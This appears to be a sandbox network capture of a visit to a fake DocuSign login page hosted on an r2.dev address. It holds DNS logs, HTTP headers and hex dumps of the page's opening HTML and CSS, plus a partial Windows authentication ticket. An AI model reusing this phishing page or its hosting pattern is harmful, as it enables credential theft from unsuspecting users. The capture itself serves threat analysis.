      Sep 29, 2024 02:45:39.317868948 CEST192.168.2.61.1.1.10xbff5Standard query (0)www.google.com65IN (0x0001)false
      Sep 29, 2024 02:45:40.096019983 CEST192.168.2.61.1.1.10x2b82Standard query (0)www.continentalsports.co.ukA (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:40.096020937 CEST192.168.2.61.1.1.10x27a1Standard query (0)www.continentalsports.co.uk65IN (0x0001)false
      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
      Sep 29, 2024 02:45:36.188916922 CEST1.1.1.1192.168.2.60xf88dNo error (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev172.66.0.235A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:36.188916922 CEST1.1.1.1192.168.2.60xf88dNo error (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev162.159.140.237A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:36.669150114 CEST1.1.1.1192.168.2.60xa413No error (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev162.159.140.237A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:36.669150114 CEST1.1.1.1192.168.2.60xa413No error (0)pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev172.66.0.235A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:38.927730083 CEST1.1.1.1192.168.2.60xd11fNo error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:39.324285030 CEST1.1.1.1192.168.2.60xc1deNo error (0)www.google.com142.250.185.132A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:39.324430943 CEST1.1.1.1192.168.2.60xbff5No error (0)www.google.com65IN (0x0001)false
      Sep 29, 2024 02:45:40.323610067 CEST1.1.1.1192.168.2.60x2b82No error (0)www.continentalsports.co.uk95.154.228.177A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:47.997637987 CEST1.1.1.1192.168.2.60xffeNo error (0)fp2e7a.wpc.2be4.phicdn.netfp2e7a.wpc.phicdn.netCNAME (Canonical name)IN (0x0001)false
      Sep 29, 2024 02:45:47.997637987 CEST1.1.1.1192.168.2.60xffeNo error (0)fp2e7a.wpc.phicdn.net192.229.221.95A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:50.180651903 CEST1.1.1.1192.168.2.60x5846No error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
      Sep 29, 2024 02:45:50.180651903 CEST1.1.1.1192.168.2.60x5846No error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
      • pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev
      • www.continentalsports.co.uk
      • fs.microsoft.com
      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      0192.168.2.649716172.66.0.235806228C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      Sep 29, 2024 02:45:36.197876930 CEST468OUTGET /ibad3.html HTTP/1.1
      Host: pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev
      Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Accept-Encoding: gzip, deflate
      Accept-Language: en-US,en;q=0.9
      Sep 29, 2024 02:45:36.650918961 CEST524INHTTP/1.1 301 Moved Permanently
      Date: Sun, 29 Sep 2024 00:45:36 GMT
      Content-Type: text/html
      Content-Length: 167
      Connection: keep-alive
      Cache-Control: max-age=3600
      Expires: Sun, 29 Sep 2024 01:45:36 GMT
      Location: https://pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev/ibad3.html
      Vary: Accept-Encoding
      Server: cloudflare
      CF-RAY: 8ca7f38fbdb98ccc-EWR
      Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>
      Sep 29, 2024 02:46:21.654844046 CEST6OUTData Raw: 00
      Data Ascii:


      Session IDSource IPSource PortDestination IPDestination Port
      0192.168.2.64971540.115.3.253443
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:36 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6c 30 77 4e 54 38 69 46 65 55 4b 61 4a 6a 2b 45 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 35 39 37 32 39 39 61 64 37 39 33 63 38 61 0d 0a 0d 0a
      Data Ascii: CNT 1 CON 305MS-CV: l0wNT8iFeUKaJj+E.1Context: 58597299ad793c8a
      2024-09-29 00:45:36 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
      Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
      2024-09-29 00:45:36 UTC1084OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 36 31 0d 0a 4d 53 2d 43 56 3a 20 6c 30 77 4e 54 38 69 46 65 55 4b 61 4a 6a 2b 45 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 35 39 37 32 39 39 61 64 37 39 33 63 38 61 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 34 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 55 56 38 47 57 55 47 78 42 57 41 76 70 4a 42 6c 32 6f 57 75 4f 36 77 42 45 50 6e 49 47 6b 50 49 44 6b 45 53 74 4c 4a 32 4b 5a 37 43 43 42 58 49 56 55 4c 64 62 59 5a 6f 79 55 57 31 5a 32 73 41 54 6e 54 51 52 39 44 4d 30 2b 42 70 73 55 4a 78 30 30 66 35 2b 62 54 52 57 66 36 36 7a 75 73 6f 4d 6d 66 66 43 73 51 6c 38 4d 54 75 4f
      Data Ascii: ATH 2 CON\DEVICE 1061MS-CV: l0wNT8iFeUKaJj+E.2Context: 58597299ad793c8a<device><compact-ticket>t=EwC4AupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAAUV8GWUGxBWAvpJBl2oWuO6wBEPnIGkPIDkEStLJ2KZ7CCBXIVULdbYZoyUW1Z2sATnTQR9DM0+BpsUJx00f5+bTRWf66zusoMmffCsQl8MTuO
      2024-09-29 00:45:36 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6c 30 77 4e 54 38 69 46 65 55 4b 61 4a 6a 2b 45 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 35 38 35 39 37 32 39 39 61 64 37 39 33 63 38 61 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
      Data Ascii: BND 3 CON\WNS 0 197MS-CV: l0wNT8iFeUKaJj+E.3Context: 58597299ad793c8a<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
      2024-09-29 00:45:37 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
      Data Ascii: 202 1 CON 58
      2024-09-29 00:45:37 UTC58INData Raw: 4d 53 2d 43 56 3a 20 43 33 6a 64 79 6d 56 77 65 30 43 4b 74 5a 43 50 49 6f 2f 4f 31 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
      Data Ascii: MS-CV: C3jdymVwe0CKtZCPIo/O1Q.0Payload parsing failed.


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      1192.168.2.649718162.159.140.2374436228C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:37 UTC696OUTGET /ibad3.html HTTP/1.1
      Host: pub-6bdd1c8eee414cc7b98afc0dfde86473.r2.dev
      Connection: keep-alive
      Upgrade-Insecure-Requests: 1
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
      Sec-Fetch-Site: none
      Sec-Fetch-Mode: navigate
      Sec-Fetch-User: ?1
      Sec-Fetch-Dest: document
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      sec-ch-ua-platform: "Windows"
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-29 00:45:37 UTC284INHTTP/1.1 200 OK
      Date: Sun, 29 Sep 2024 00:45:37 GMT
      Content-Type: text/html
      Content-Length: 252205
      Connection: close
      Accept-Ranges: bytes
      ETag: "3e9e5a9e7c28bbe281c1f7e9d8c655f9"
      Last-Modified: Mon, 26 Aug 2024 19:23:52 GMT
      Server: cloudflare
      CF-RAY: 8ca7f3939f3c4258-EWR
      2024-09-29 00:45:37 UTC1085INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 20 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 20 63 6c 61 73 73 3d 61 63 63 6f 75 6e 74 2d 73 65 72 76 65 72 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 3c 74 69 74 6c 65 3e 44 6f 63 75 53 69 67 6e 20 4c 6f 67 69 6e 20 2d 20 45 6e 74 65 72 20 79 6f 75 72 20 70 61 73 73 77 6f 72 64 20 74 6f 20 73 69 67 6e 20 69 6e 3c 2f 74 69 74 6c 65 3e 0a 0a 3c 73 74 79 6c 65 20 64 61 74 61 2d 65 6d 6f 74 69 6f 6e 3d 63 73 73 20 64 61 74 61 2d 73 69 6e 67 6c 65 2d 66 69 6c 65 7a 2d 73 74 79 6c 65 73 68 65 65 74 3d 31 36 3e 2e 61 63 63 6f 75 6e 74 2d 73 65 72 76
      Data Ascii: <!DOCTYPE html> <html lang=en class=account-server><meta charset=utf-8><meta name=viewport content="initial-scale=1.0"><title>DocuSign Login - Enter your password to sign in</title><style data-emotion=css data-single-filez-stylesheet=16>.account-serv
      2024-09-29 00:45:37 UTC1369INData Raw: 69 6e 6b 2d 62 6f 64 79 7b 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 63 65 6e 74 65 72 7d 7d 40 6d 65 64 69 61 20 28 6d 69 6e 2d 77 69 64 74 68 3a 36 30 30 70 78 29 7b 2e 69 6e 6b 2d 62 6f 64 79 7b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 3b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 7d 7d 2e 69 6e 6b 2d 70 61 67 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 31 2e 35 72 65 6d 7d 2e 69 6e 6b 2d 66 6f 72 6d 2d 75 6e 69 74 3a 66 69 72 73 74 2d 63 68 69 6c 64 7b 6d 61 72 67 69 6e 2d 74 6f 70 3a 32 72 65 6d 7d 2e 69 6e 6b 2d 73 65 63 6f 6e 64 61 72 79 2d 62 75 74 74 6f 6e
      Data Ascii: ink-body{justify-content:center}}@media (min-width:600px){.ink-body{display:flex;flex-direction:column;align-items:center}}.ink-page-title{margin-bottom:1rem}.ink-form-unit{margin-top:1.5rem}.ink-form-unit:first-child{margin-top:2rem}.ink-secondary-button
      2024-09-29 00:45:37 UTC1369INData Raw: 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 61 6e 74 69 61 6c 69 61 73 65 64 3b 2d 6d 6f 7a 2d 6f 73 78 2d 66 6f 6e 74 2d 73 6d 6f 6f 74 68 69 6e 67 3a 67 72 61 79 73 63 61 6c 65 7d 2a 2c 3a 3a 61 66 74 65 72 2c 3a 3a 62 65 66 6f 72 65 7b 62 6f 78 2d 73 69 7a 69 6e 67 3a 69 6e 68 65 72 69 74 7d 40 66 6f 6e 74 2d 66 61 63 65 7b 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 22 44 53 49 6e 64 69 67 6f 22 3b 66 6f 6e 74 2d 73 74 79 6c 65 3a 6e 6f 72 6d 61 6c 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 34 30 30 3b 73 72 63 3a 75 72 6c 28 64 61 74 61 3a 66 6f 6e 74 2f 77 6f 66 66 32 3b 62 61 73 65 36 34 2c 64 30 39 47 4d 67 41 42 41 41 41 41 41 48 4e 4d 41 42 49 41 41 41 41 42 59 73 77 41 41 48 4c 6b 41 41 45 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41 41
      Data Ascii: t-smoothing:antialiased;-moz-osx-font-smoothing:grayscale}*,::after,::before{box-sizing:inherit}@font-face{font-family:"DSIndigo";font-style:normal;font-weight:400;src:url(data:font/woff2;base64,d09GMgABAAAAAHNMABIAAAABYswAAHLkAAEAAAAAAAAAAAAAAAAAAAAAAAAA
      2024-09-29 00:45:37 UTC1369INData Raw: 39 37 64 2f 4f 2f 52 6b 6a 39 6e 79 59 4f 36 43 48 78 45 54 38 30 77 58 48 74 48 74 63 78 64 31 6e 72 41 54 65 72 6c 46 4a 4b 4b 54 71 6e 6a 32 48 5a 76 67 75 4b 46 44 7a 56 42 53 72 61 33 55 65 6b 54 61 4a 74 2b 76 64 72 67 62 59 57 78 52 51 4b 48 53 4a 57 61 48 48 36 74 58 68 7a 61 77 2f 31 6a 6b 31 38 2f 61 50 6e 62 36 43 55 5a 42 53 30 30 66 79 75 64 35 54 66 6e 75 2f 35 6e 6f 39 47 6f 79 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 69 4b 6f 69 67 36 4f 6a 72 61 72 77 48 34 39 65 32 37 77 62 6c 48 55 78 52 46 30 52 52 4e 36 2f 44 41 4c 64 6f 6c 47 6b 56 52 4e 49 6f 75 43 37 53 7a 2f 4d 4a 5a 71 41 55 45 4b 48 4d 79 7a 75 79 45 64 6c 63 2b 61 5a 75 41 41 67 41 2f 31 64 53 76 61 35 58 6b 2f 6d 6b 46 5a 71 78 6b 50 69 52 2f 41 50 6a 73 41
      Data Ascii: 97d/O/Rkj9nyYO6CHxET80wXHtHtcxd1nrATerlFJKKTqnj2HZvguKFDzVBSra3UekTaJt+vdrgbYWxRQKHSJWaHH6tXhzaw/1jk18/aPnb6CUZBS00fyud5Tfnu/5no9GoyiKoiiKoiiKoiiKoiiKoiiKoig6OjrarwH49e27wblHUxRF0RRN6/DALdolGkVRNIouC7Sz/MJZqAUEKHMyzuyEdlc+aZuAAgA/1dSva5Xk/mkFZqxkPiR/APjsA
      2024-09-29 00:45:37 UTC1369INData Raw: 56 37 62 7a 51 6d 4e 31 7a 30 46 42 73 49 4f 5a 4b 32 45 45 62 53 6a 62 52 6c 45 38 4f 71 57 65 62 63 6f 57 77 6b 6f 43 6e 6e 54 6c 4f 4f 35 2b 68 50 47 6a 6b 64 33 69 34 71 79 49 56 73 53 69 76 6f 63 4d 41 37 6c 2b 41 66 6c 5a 35 37 70 68 6a 2f 39 76 69 37 7a 2b 79 63 75 78 7a 39 2f 32 37 49 64 6d 4f 33 74 4f 38 58 6f 37 58 6d 50 36 45 69 4d 6b 70 44 5a 32 55 5a 79 57 6b 6c 4a 43 52 77 73 39 4d 44 7a 33 68 65 7a 47 6a 78 6e 37 74 37 45 56 69 50 38 77 68 68 45 4e 78 68 78 32 50 4d 6c 57 58 79 44 7a 70 4c 46 34 7a 37 38 75 58 7a 49 70 61 57 47 74 6d 6f 2b 58 4b 6e 74 66 45 69 2f 4d 6c 63 79 5a 59 4c 72 2f 77 77 6d 4f 49 4e 2b 68 51 46 70 30 49 76 6b 54 2f 71 2b 4b 43 6f 6c 4c 7a 51 36 41 76 4d 63 50 77 31 43 43 55 70 49 77 68 6b 49 78 54 38 34 4c 6b 78 69
      Data Ascii: V7bzQmN1z0FBsIOZK2EEbSjbRlE8OqWebcoWwkoCnnTlOO5+hPGjkd3i4qyIVsSivocMA7l+AflZ57phj/9vi7z+ycuxz9/27IdmO3tO8Xo7XmP6EiMkpDZ2UZyWklJCRws9MDz3hezGjxn7t7EViP8whhENxhx2PMlWXyDzpLF4z78uXzIpaWGtmo+XKntfEi/MlcyZYLr/wwmOIN+hQFp0IvkT/q+KColLzQ6AvMcPw1CCUpIwhkIxT84Lkxi
      2024-09-29 00:45:37 UTC1369INData Raw: 64 59 66 4f 4d 43 65 75 50 54 46 49 72 54 6f 6f 75 6d 68 36 44 42 67 79 4e 70 4f 4a 57 55 79 5a 64 30 73 30 75 2b 70 43 57 72 7a 68 52 31 52 54 55 46 4b 6c 53 5a 63 68 6b 30 53 57 6e 46 53 38 31 30 71 55 71 76 6c 32 4a 54 71 4a 62 58 54 5a 69 34 4d 4f 4f 65 4b 59 55 38 34 34 6c 77 76 6b 34 74 32 6c 58 4a 36 75 75 4f 71 61 36 32 37 6c 44 75 37 6c 41 56 35 34 35 63 32 64 4c 32 6a 66 64 46 33 63 77 43 34 65 6f 6b 50 77 50 53 55 6d 61 54 47 6b 7a 34 6e 45 35 6f 36 4d 65 52 30 4d 41 5a 49 75 6f 61 45 58 66 63 2b 41 49 65 50 4d 68 49 6c 5a 6a 57 56 4d 49 32 61 54 65 62 56 41 73 34 78 56 73 6d 62 54 62 56 48 73 69 50 32 46 73 48 72 69 38 59 37 76 4b 37 2b 49 53 4c 4b 54 49 72 57 6d 59 61 54 4c 6b 45 6b 69 53 30 35 79 49 33 6b 71 58 34 46 43 78 53 6c 42 71 54 4c
      Data Ascii: dYfOMCeuPTFIrTooumh6DBgyNpOJWUyZd0s0u+pCWrzhR1RTUFKlSZchk0SWnFS810qUqvl2JTqJbXTZi4MOOeKYU844lwvk4t2lXJ6uuOqa627lDu7lAV545c2dL2jfdF3cwC4eokPwPSUmaTGkz4nE5o6MeR0MAZIuoaEXfc+AIePMhIlZjWVMI2aTebVAs4xVsmbTbVHsiP2FsHri8Y7vK7+ISLKTIrWmYaTLkEkiS05yI3kqX4FCxSlBqTL
      2024-09-29 00:45:37 UTC1369INData Raw: 37 4b 4a 48 53 75 77 42 4b 41 4c 5a 6d 58 42 2b 61 34 57 6c 63 36 55 78 6f 6b 67 4c 68 67 56 70 48 52 46 30 71 34 35 77 59 72 4f 68 69 43 47 71 6a 52 67 72 73 61 30 56 68 43 36 30 7a 51 6e 4c 6e 73 79 57 73 67 77 65 31 7a 58 31 4e 74 41 31 37 7a 34 67 6a 33 4d 59 30 33 38 56 6c 74 36 44 69 2f 50 4d 49 51 49 6c 67 4c 67 6b 34 73 54 65 44 74 51 46 57 32 79 64 67 67 65 4b 58 58 59 41 52 2b 55 41 63 32 57 65 63 37 76 56 70 6b 46 51 77 64 48 46 75 67 46 54 4a 51 6b 58 4e 55 45 70 61 62 5a 34 6b 2b 6e 36 74 36 2b 6c 41 35 54 6c 75 2f 4f 33 77 45 69 67 64 64 70 58 6c 65 31 67 66 59 55 37 41 4d 55 67 6b 6c 6b 42 6f 65 56 71 45 65 59 6b 6a 34 64 44 4f 61 67 68 75 62 31 7a 51 57 76 46 34 48 53 63 6e 33 78 52 74 64 55 6b 4e 4d 74 55 76 70 39 42 67 54 44 63 49 6c 73
      Data Ascii: 7KJHSuwBKALZmXB+a4Wlc6UxokgLhgVpHRF0q45wYrOhiCGqjRgrsa0VhC60zQnLnsyWsgwe1zX1NtA17z4gj3MY038Vlt6Di/PMIQIlgLgk4sTeDtQFW2ydggeKXXYAR+UAc2Wec7vVpkFQwdHFugFTJQkXNUEpabZ4k+n6t6+lA5Tlu/O3wEigddpXle1gfYU7AMUgklkBoeVqEeYkj4dDOaghub1zQWvF4HScn3xRtdUkNMtUvp9BgTDcIls
      2024-09-29 00:45:37 UTC1369INData Raw: 64 37 43 30 46 65 59 65 6c 4b 7a 44 44 5a 54 42 30 36 2f 45 55 48 6f 42 31 50 6a 6c 7a 44 2f 61 70 79 73 74 53 57 67 6c 7a 6d 32 76 61 49 73 63 61 35 6c 48 31 33 71 42 39 67 42 62 68 6b 43 48 56 63 65 53 6a 59 30 31 52 2f 65 4d 36 74 6a 72 58 6b 36 54 70 6e 63 61 77 43 75 34 46 49 31 49 71 36 6e 64 47 75 59 74 32 71 33 34 74 46 55 74 61 77 4d 57 72 54 49 72 4c 4a 45 4d 6f 46 65 5a 41 36 73 76 2b 4e 79 70 35 59 54 79 6e 78 68 45 44 73 33 54 37 35 47 7a 6d 55 69 33 5a 6c 53 37 4b 79 51 35 68 54 30 55 2b 57 6c 48 6b 69 6d 43 2b 75 48 7a 62 41 4e 6b 67 30 52 44 55 73 61 6f 54 50 5a 42 6f 56 4e 51 2b 52 6e 35 57 48 31 69 71 72 65 59 31 32 48 56 75 48 59 4c 33 45 42 71 6d 4e 4d 70 73 45 6d 7a 56 73 6b 64 75 71 73 45 33 44 64 71 57 54 75 39 6f 70 7a 68 53 63 52
      Data Ascii: d7C0FeYelKzDDZTB06/EUHoB1PjlzD/apystSWglzm2vaIsca5lH13qB9gBbhkCHVceSjY01R/eM6tjrXk6TpncawCu4FI1Iq6ndGuYt2q34tFUtawMWrTIrLJEMoFeZA6sv+Nyp5YTynxhEDs3T75GzmUi3ZlS7KyQ5hT0U+WlHkimC+uHzbANkg0RDUsaoTPZBoVNQ+Rn5WH1iqreY12HVuHYL3EBqmNMpsEmzVskduqsE3DdqWTu9opzhScR
      2024-09-29 00:45:37 UTC1369INData Raw: 48 35 31 48 2f 4f 6b 4c 31 73 46 33 47 68 69 57 37 6c 55 55 71 64 4e 42 66 53 61 53 43 7a 4f 6c 64 72 55 6c 2f 49 35 6c 36 75 36 59 30 43 61 4e 63 65 32 72 70 77 4e 54 77 57 64 35 39 4f 77 33 69 74 38 6d 34 55 67 4e 51 4e 4d 63 41 75 4b 71 54 4b 53 46 4b 55 78 53 70 76 44 59 43 4b 70 70 6a 41 42 71 74 35 4a 70 64 51 58 6f 6e 44 38 73 51 61 6b 6f 73 79 57 73 54 55 6d 32 54 41 50 52 67 5a 41 71 38 76 70 33 76 46 46 72 48 58 54 45 54 77 70 6b 56 4f 6a 56 6c 5a 66 4c 54 41 66 7a 39 68 61 4d 70 69 7a 57 32 2b 56 2f 67 54 64 5a 34 53 51 54 66 30 61 68 39 6f 4a 75 65 68 39 7a 56 76 56 47 5a 37 53 34 4f 44 30 79 2f 6f 30 54 76 71 30 56 63 47 4f 76 72 4c 72 32 55 6e 34 70 4b 4c 75 2f 59 58 38 32 66 54 55 70 4e 48 6b 38 69 42 45 6d 4a 36 42 67 52 30 2b 52 4c 53 4c
      Data Ascii: H51H/OkL1sF3GhiW7lUUqdNBfSaSCzOldrUl/I5l6u6Y0CaNce2rpwNTwWd59Ow3it8m4UgNQNMcAuKqTKSFKUxSpvDYCKppjABqt5JpdQXonD8sQakosyWsTUm2TAPRgZAq8vp3vFFrHXTETwpkVOjVlZfLTAfz9haMpizW2+V/gTdZ4SQTf0ah9oJueh9zVvVGZ7S4OD0y/o0Tvq0VcGOvrLr2Un4pKLu/YX82fTUpNHk8iBEmJ6BgR0+RLSL
      2024-09-29 00:45:37 UTC1369INData Raw: 50 64 6a 61 6e 78 68 64 63 72 48 67 6a 79 75 30 4c 47 31 6d 2f 4e 66 4e 31 4d 30 50 45 2b 34 66 44 78 4c 56 36 52 38 67 6c 77 4e 64 61 71 6c 47 59 35 74 34 5a 6b 38 76 33 63 76 6a 76 64 73 2f 36 31 65 42 51 7a 38 61 47 65 37 30 4e 56 39 4e 68 53 62 55 79 47 65 66 52 35 4b 50 75 67 58 76 75 59 62 65 69 74 37 5a 7a 57 52 6c 65 37 48 52 38 76 70 48 36 71 38 4c 64 36 79 6d 50 53 45 4c 33 33 48 69 2b 46 75 54 51 6d 47 68 6b 58 58 5a 75 74 5a 72 47 7a 74 37 36 41 37 59 61 42 51 47 6f 53 63 32 7a 71 55 31 6f 6b 4c 4b 77 61 50 74 45 53 32 61 59 31 66 30 46 74 68 6f 4a 4b 6d 2f 74 57 34 44 7a 77 64 70 7a 4c 53 43 38 6d 47 68 30 59 4a 77 58 65 52 38 69 39 67 39 53 38 6d 64 76 71 38 2f 41 58 31 6c 4c 71 69 76 4d 5a 6e 75 7a 45 38 6d 6d 4f 74 47 6e 62 6d 44 2f 32 5a
      Data Ascii: PdjanxhdcrHgjyu0LG1m/NfN1M0PE+4fDxLV6R8glwNdaqlGY5t4Zk8v3cvjvds/61eBQz8aGe70NV9NhSbUyGefR5KPugXvuYbeit7ZzWRle7HR8vpH6q8Ld6ymPSEL33Hi+FuTQmGhkXXZutZrGzt76A7YaBQGoSc2zqU1okLKwaPtES2aY1f0FthoJKm/tW4DzwdpzLSC8mGh0YJwXeR8i9g9S8mdvq8/AX1lLqivMZnuzE8mmOtGnbmD/2Z


      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
      2192.168.2.64972295.154.228.1774436228C:\Program Files\Google\Chrome\Application\chrome.exe
      TimestampBytes transferredDirectionData
      2024-09-29 00:45:39 UTC635OUTGET /media/catalog/product/cache/7fd38fa62b8fefd3d046b3795a3b5e36/b/l/blurred_invoice.jpg HTTP/1.1
      Host: www.continentalsports.co.uk
      Connection: keep-alive
      sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
      sec-ch-ua-mobile: ?0
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
      sec-ch-ua-platform: "Windows"
      Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
      Sec-Fetch-Site: cross-site
      Sec-Fetch-Mode: no-cors
      Sec-Fetch-Dest: image
      Accept-Encoding: gzip, deflate, br
      Accept-Language: en-US,en;q=0.9
      2024-09-29 00:45:39 UTC370INHTTP/1.1 200 OK
